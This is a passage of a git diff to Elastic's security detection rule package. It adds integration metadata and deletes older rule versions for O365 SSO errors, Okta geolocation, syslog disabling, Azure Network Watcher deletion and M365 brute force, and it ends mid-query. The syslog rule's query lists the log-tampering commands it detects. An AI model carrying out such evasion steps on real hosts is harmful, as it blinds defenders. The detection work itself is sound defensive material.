{ - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 1 - }, - "id": "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_3.json b/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_3.json index 6743c8527d8..2523ece8360 100644 --- a/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/2d6f5332-42ea-11f0-b09a-f661ea17fbcd_3.json @@ -24,6 +24,12 @@ "https://github.com/0xZDH/Omnispray", "https://github.com/0xZDH/o365spray" ], + "related_integrations": [ + { + "package": "azure", + "version": "^1.0.0" + } + ], "risk_score": 73, "rule_id": "2d6f5332-42ea-11f0-b09a-f661ea17fbcd", "severity": "high", diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_208.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_208.json deleted file mode 100644 index 2f4d3a17cc7..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_208.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Austin Songer" - ], - "description": "Identifies accounts with a high number of single sign-on (SSO) logon errors. Excessive logon errors may indicate an attempt to brute force a password or SSO token.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." - ], - "from": "now-20m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "O365 Excessive Single Sign-On Logon Errors", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating O365 Excessive Single Sign-On Logon Errors\n\nSingle Sign-On (SSO) in O365 streamlines user access by allowing one set of credentials for multiple applications. However, adversaries may exploit this by attempting brute force attacks to gain unauthorized access. The detection rule monitors for frequent SSO logon errors, signaling potential abuse, and helps identify compromised accounts by flagging unusual authentication patterns.\n\n### Possible investigation steps\n\n- Review the specific account(s) associated with the excessive SSO logon errors by examining the event logs filtered by the query fields, particularly focusing on the o365.audit.LogonError field with the value \"SsoArtifactInvalidOrExpired\".\n- Analyze the timestamps of the logon errors to determine if there is a pattern or specific time frame when the errors are occurring, which might indicate a targeted attack.\n- Check for any recent changes or unusual activities in the affected account(s), such as password changes, unusual login locations, or device changes, to assess if the account might be compromised.\n- Investigate the source IP addresses associated with the logon errors to identify if they are from known malicious sources or unusual locations for the user.\n- Correlate the logon error events with other security alerts or logs from the same time period to identify any related suspicious activities or potential indicators of compromise.\n- Contact the user(s) of the affected account(s) to verify if they experienced any issues with their account access or if they recognize the logon attempts, which can help determine if the activity is legitimate or malicious.\n\n### False positive analysis\n\n- High volume of legitimate user logins: Users who frequently log in and out of multiple O365 applications may trigger excessive logon errors. To manage this, create exceptions for known high-activity accounts.\n- Automated scripts or applications: Some automated processes may use outdated or incorrect credentials, leading to repeated logon errors. Identify and update these scripts to prevent false positives.\n- Password changes: Users who recently changed their passwords might experience logon errors if they have not updated their credentials across all devices and applications. Encourage users to update their credentials promptly.\n- Network issues: Temporary network disruptions can cause authentication errors. Monitor network stability and consider excluding errors during known network maintenance periods.\n- Multi-factor authentication (MFA) misconfigurations: Incorrect MFA settings can lead to logon errors. Verify and correct MFA configurations for affected users to reduce false positives.\n\n### Response and remediation\n\n- Immediately isolate the affected account by disabling it to prevent further unauthorized access attempts.\n- Conduct a password reset for the compromised account and enforce a strong password policy to mitigate the risk of future brute force attacks.\n- Review and analyze the account's recent activity logs to identify any unauthorized access or data exfiltration attempts.\n- Implement multi-factor authentication (MFA) for the affected account and other high-risk accounts to add an additional layer of security.\n- Notify the user of the affected account about the incident and provide guidance on recognizing phishing attempts and securing their credentials.\n- Escalate the incident to the security operations team for further investigation and to determine if additional accounts or systems have been compromised.\n- Update and enhance monitoring rules to detect similar patterns of excessive SSO logon errors, ensuring early detection of potential brute force attempts.", - "query": "event.dataset:o365.audit and event.provider:AzureActiveDirectory and event.category:authentication and o365.audit.LogonError:\"SsoArtifactInvalidOrExpired\"\n", - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.LogonError", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "2de10e77-c144-4e69-afb7-344e7127abd0", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/" - } - ] - } - ], - "threshold": { - "field": [ - "user.id" - ], - "value": 5 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 208 - }, - "id": "2de10e77-c144-4e69-afb7-344e7127abd0_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_305.json b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_305.json deleted file mode 100644 index e2e51c0604e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_305.json +++ /dev/null @@ -1,63 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations.", - "from": "now-30m", - "interval": "15m", - "language": "esql", - "license": "Elastic License v2", - "name": "Okta User Sessions Started from Different Geolocations", - "note": "## Triage and analysis\n\n### Investigating Okta User Sessions Started from Different Geolocations\n\nThis rule detects when a specific Okta actor has multiple sessions started from different geolocations. Adversaries may attempt to launch an attack by using a list of known usernames and passwords to gain unauthorized access to user accounts from different locations.\n\n#### Possible investigation steps:\n- Since this is an ES|QL rule, the `okta.actor.alternate_id` and `okta.client.id` values can be used to pivot into the raw authentication events related to this alert.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- It is very rare that a legitimate user would have multiple sessions started from different geo-located countries in a short time frame.\n\n### Response and remediation:\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n", - "query": "FROM logs-okta*\n| WHERE\n event.dataset == \"okta.system\"\n AND (event.action RLIKE \"user\\\\.authentication(.*)\" OR event.action == \"user.session.start\")\n AND okta.security_context.is_proxy != true and okta.actor.id != \"unknown\"\n AND event.outcome == \"success\"\n| KEEP event.action, okta.security_context.is_proxy, okta.actor.id, event.outcome, client.geo.country_name, okta.actor.alternate_id\n| STATS\n geo_auth_counts = COUNT_DISTINCT(client.geo.country_name)\n BY okta.actor.id, okta.actor.alternate_id\n| WHERE\n geo_auth_counts >= 2\n", - "references": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection", - "https://www.rezonate.io/blog/okta-logs-decoded-unveiling-identity-threats-through-threat-hunting/", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "risk_score": 47, - "rule_id": "2e56e1bc-867a-11ee-b13e-f661ea17fbcd", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", - "severity": "medium", - "tags": [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.004", - "name": "Cloud Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/004/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 305 - }, - "id": "2e56e1bc-867a-11ee-b13e-f661ea17fbcd_305", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_308.json b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_308.json index fbcbe1128d9..c9fc62be923 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_308.json +++ b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_308.json @@ -20,6 +20,12 @@ "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" ], + "related_integrations": [ + { + "package": "okta", + "version": "^3.0.0" + } + ], "risk_score": 47, "rule_id": "2e56e1bc-867a-11ee-b13e-f661ea17fbcd", "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n", diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_212.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_212.json deleted file mode 100644 index 395ff309e62..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_212.json +++ /dev/null @@ -1,109 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls.", - "from": "now-9m", - "index": [ - "auditbeat-*", - "endgame-*", - "logs-crowdstrike.fdr*", - "logs-endpoint.events.process*", - "logs-sentinel_one_cloud_funnel.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Attempt to Disable Syslog Service", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Attempt to Disable Syslog Service\n\nSyslog is a critical component in Linux environments, responsible for logging system events and activities. Adversaries may target syslog to disable logging, thereby evading detection and obscuring their malicious actions. The detection rule identifies attempts to stop or disable syslog services by monitoring specific process actions and arguments, flagging suspicious commands that could indicate an attempt to impair logging defenses.\n\n### Possible investigation steps\n\n- Review the process details to identify the user account associated with the command execution, focusing on the process.name and process.args fields to determine if the action was legitimate or suspicious.\n- Check the system's recent login history and user activity to identify any unauthorized access attempts or anomalies around the time the syslog service was targeted.\n- Investigate the parent process of the flagged command to understand the context of its execution and determine if it was initiated by a legitimate application or script.\n- Examine other logs and alerts from the same host around the time of the event to identify any correlated suspicious activities or patterns that might indicate a broader attack.\n- Assess the system for any signs of compromise, such as unexpected changes in configuration files, unauthorized software installations, or unusual network connections, to determine if the attempt to disable syslog is part of a larger attack.\n\n### False positive analysis\n\n- Routine maintenance activities may trigger this rule, such as scheduled service restarts or system updates. To manage this, create exceptions for known maintenance windows or specific administrative accounts performing these tasks.\n- Automated scripts or configuration management tools like Ansible or Puppet might stop or disable syslog services as part of their operations. Identify these scripts and whitelist their execution paths or associated user accounts.\n- Testing environments often simulate service disruptions, including syslog, for resilience testing. Exclude these environments from the rule or adjust the rule to ignore specific test-related processes.\n- Some legitimate software installations or updates may require stopping syslog services temporarily. Monitor installation logs and exclude these processes if they are verified as non-threatening.\n- In environments with multiple syslog implementations, ensure that the rule is not overly broad by refining the process arguments to match only the specific syslog services in use.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further malicious activity and potential lateral movement by the adversary.\n- Terminate any suspicious processes identified in the alert, specifically those attempting to stop or disable syslog services, to restore normal logging functionality.\n- Restart the syslog service on the affected system to ensure that logging is re-enabled and operational, using commands like `systemctl start syslog` or `service syslog start`.\n- Conduct a thorough review of recent logs, if available, to identify any additional suspicious activities or indicators of compromise that may have occurred prior to the syslog service being disabled.\n- Escalate the incident to the security operations team for further investigation and to determine if the attack is part of a larger campaign or if other systems are affected.\n- Implement additional monitoring on the affected system and similar systems to detect any further attempts to disable logging services, using enhanced logging and alerting mechanisms.\n- Review and update access controls and permissions to ensure that only authorized personnel have the ability to modify or stop critical services like syslog, reducing the risk of future incidents.", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"start\", \"ProcessRollup2\") and\n ( (process.name == \"service\" and process.args == \"stop\") or\n (process.name == \"chkconfig\" and process.args == \"off\") or\n (process.name == \"systemctl\" and process.args in (\"disable\", \"stop\", \"kill\"))\n ) and process.args in (\"syslog\", \"rsyslog\", \"syslog-ng\", \"syslog.service\", \"rsyslog.service\", \"syslog-ng.service\") and\nnot process.parent.name == \"rsyslog-rotate\"\n", - "references": [ - "https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "crowdstrike", - "version": "^1.1.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.args", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.parent.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "2f8a1226-5720-437d-9c20-e0029deb6194", - "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 212 - }, - "id": "2f8a1226-5720-437d-9c20-e0029deb6194_212", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_103.json b/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_103.json deleted file mode 100644 index f97c37ee1fd..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/323cb487-279d-4218-bcbd-a568efe930c6_103.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of a Network Watcher in Azure. Network Watchers are used to monitor, diagnose, view metrics, and enable or disable logs for resources in an Azure virtual network. An adversary may delete a Network Watcher in an attempt to evade defenses.", - "false_positives": [ - "Network Watcher deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Network Watcher deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Network Watcher Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Network Watcher Deletion\n\nAzure Network Watcher is a vital tool for monitoring and diagnosing network issues within Azure environments. It provides insights and logging capabilities crucial for maintaining network security. Adversaries may delete Network Watchers to disable these monitoring functions, thereby evading detection. The detection rule identifies such deletions by monitoring Azure activity logs for specific delete operations, flagging successful attempts as potential security threats.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to confirm the deletion event by checking for the operation name \"MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE\" and ensuring the event outcome is marked as \"Success\" or \"success\".\n- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs.\n- Investigate the timeline of events leading up to the deletion by reviewing related activity logs for any unusual or unauthorized access patterns or changes in permissions.\n- Assess the impact of the deletion by determining which resources were being monitored by the deleted Network Watcher and evaluating the potential security implications.\n- Check for any other suspicious activities or alerts in the Azure environment that may indicate a broader attack or compromise, focusing on defense evasion tactics.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel may trigger the deletion alert. Verify if the deletion aligns with scheduled maintenance and consider excluding these operations from alerts.\n- Automated scripts or tools used for infrastructure management might delete Network Watchers as part of their normal operation. Identify these scripts and whitelist their activity to prevent false positives.\n- Changes in network architecture or resource reallocation can lead to legitimate deletions. Review change management logs to confirm if the deletion was planned and adjust the detection rule to exclude these scenarios.\n- Test environments often undergo frequent changes, including the deletion of Network Watchers. If these environments are known to generate false positives, consider creating exceptions for specific resource groups or subscriptions associated with testing.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure resources to prevent further unauthorized actions. This can be done by restricting network access or applying stricter security group rules.\n- Review Azure activity logs to identify the user or service principal responsible for the deletion. Verify if the action was authorized and investigate any suspicious accounts.\n- Restore the deleted Network Watcher by redeploying it in the affected regions to resume monitoring and logging capabilities.\n- Conduct a security review of the affected Azure environment to identify any other potential misconfigurations or unauthorized changes.\n- Implement stricter access controls and auditing for Azure resources, ensuring that only authorized personnel have the ability to delete critical monitoring tools like Network Watchers.\n- Escalate the incident to the security operations team for further investigation and to determine if additional security measures are necessary.\n- Enhance detection capabilities by ensuring that alerts for similar deletion activities are configured to notify the security team immediately.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE\" and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-monitoring-overview" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.operation_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "323cb487-279d-4218-bcbd-a568efe930c6", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Network Security Monitoring", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "323cb487-279d-4218-bcbd-a568efe930c6_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_104.json b/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_104.json deleted file mode 100644 index 98fa7b41e66..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/35ab3cfa-6c67-11ef-ab4d-f661ea17fbcc_104.json +++ /dev/null @@ -1,80 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies potential brute-force attacks targeting Microsoft 365 user accounts by analyzing failed sign-in patterns in Microsoft Entra ID Sign-In Logs. This detection focuses on a high volume of failed interactive or non-interactive authentication attempts within a short time window, often indicative of password spraying, credential stuffing, or password guessing. Adversaries may use these techniques to gain unauthorized access to Microsoft 365 services such as Exchange Online, SharePoint, or Teams.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials or have misconfigured authentication settings may lead to false positives." - ], - "from": "now-60m", - "interval": "10m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential Microsoft 365 Brute Force via Entra ID Sign-Ins", - "note": "## Triage and analysis\n\n### Investigating Potential Microsoft 365 Brute Force via Entra ID Sign-Ins\n\nIdentifies brute-force authentication activity against Microsoft 365 services using Entra ID sign-in logs. This detection groups and classifies failed sign-in attempts based on behavior indicative of password spraying, credential stuffing, or password guessing. The classification (`bf_type`) is included for immediate triage.\n\n### Possible investigation steps\n\n- Review `bf_type`: Classifies the brute-force behavior (`password_spraying`, `credential_stuffing`, `password_guessing`).\n- Examine `user_id_list`: Review the identities targeted. Are they admins, service accounts, or external identities?\n- Review `login_errors`: Multiple identical errors (e.g., `\"Invalid grant...\"`) suggest automated abuse or tooling.\n- Check `ip_list` and `source_orgs`: Determine if requests came from known VPNs, hosting providers, or anonymized infrastructure.\n- Validate `unique_ips` and `countries`: Multiple countries or IPs in a short window may indicate credential stuffing or distributed spray attempts.\n- Compare `total_attempts` vs `duration_seconds`: High volume over a short duration supports non-human interaction.\n- Inspect `user_agent.original` via `device_detail_browser`: Clients like `Python Requests` or `curl` are highly suspicious.\n- Investigate `client_app_display_name` and `incoming_token_type`: Identify non-browser-based logins, token abuse or commonly mimicked clients like VSCode.\n- Review `target_resource_display_name`: Confirm the service being targeted (e.g., SharePoint, Exchange). This may be what authorization is being attempted against.\n- Pivot using `session_id` and `device_detail_device_id`: Determine if a single device is spraying multiple accounts.\n- Check `conditional_access_status`: If \"notApplied\", determine whether conditional access is properly scoped.\n- Correlate `user_principal_name` with successful sign-ins: Investigate surrounding logs for lateral movement or privilege abuse.\n\n### False positive analysis\n\n- Developer automation (e.g., CI/CD logins) or mobile sync errors may create noisy but benign login failures.\n- Red team exercises or pentesting can resemble brute-force patterns.\n- Legacy protocols or misconfigured service principals may trigger repeated login failures from the same IP or session.\n\n### Response and remediation\n\n- Notify identity or security operations teams to investigate further.\n- Lock or reset affected user accounts if compromise is suspected.\n- Block the source IP(s) or ASN temporarily using conditional access or firewall rules.\n- Review tenant-wide MFA and conditional access enforcement.\n- Audit targeted accounts for password reuse across systems or tenants.\n- Enable lockout or throttling policies for repeated failed login attempts.\n", - "query": "FROM logs-azure.signinlogs*\n\n| EVAL\n time_window = DATE_TRUNC(5 minutes, @timestamp),\n user_id = TO_LOWER(azure.signinlogs.properties.user_principal_name),\n ip = source.ip,\n login_error = azure.signinlogs.result_description,\n error_code = azure.signinlogs.result_type,\n request_type = TO_LOWER(azure.signinlogs.properties.incoming_token_type),\n app_name = TO_LOWER(azure.signinlogs.properties.app_display_name),\n asn_org = source.`as`.organization.name,\n country = source.geo.country_name,\n user_agent = user_agent.original,\n event_time = @timestamp\n\n| WHERE event.dataset == \"azure.signinlogs\"\n AND event.category == \"authentication\"\n AND azure.signinlogs.category IN (\"NonInteractiveUserSignInLogs\", \"SignInLogs\")\n AND azure.signinlogs.properties.resource_display_name RLIKE \"(.*)365|SharePoint|Exchange|Teams|Office(.*)\"\n AND event.outcome == \"failure\"\n AND NOT STARTS_WITH(\"Account is locked\", login_error)\n AND azure.signinlogs.result_type IN (\n \"50034\", // UserAccountNotFound\n \"50126\", // InvalidUserNameOrPassword\n \"50053\", // IdsLocked or too many sign-in failures\n \"70000\", // InvalidGrant\n \"70008\", // Expired or revoked refresh token\n \"70043\", // Bad token due to sign-in frequency\n \"50057\", // UserDisabled\n \"50055\", // Password expired\n \"50056\", // Invalid or null password\n \"50064\", // Credential validation failure\n \"50076\", // MFA required but not passed\n \"50079\", // MFA registration required\n \"50105\" // EntitlementGrantsNotFound (no access to app)\n )\n AND user_id IS NOT NULL AND user_id != \"\"\n AND user_agent != \"Mozilla/5.0 (compatible; MSAL 1.0) PKeyAuth/1.0\"\n\n| STATS\n authentication_requirement = VALUES(azure.signinlogs.properties.authentication_requirement),\n client_app_id = VALUES(azure.signinlogs.properties.app_id),\n client_app_display_name = VALUES(azure.signinlogs.properties.app_display_name),\n target_resource_id = VALUES(azure.signinlogs.properties.resource_id),\n target_resource_display_name = 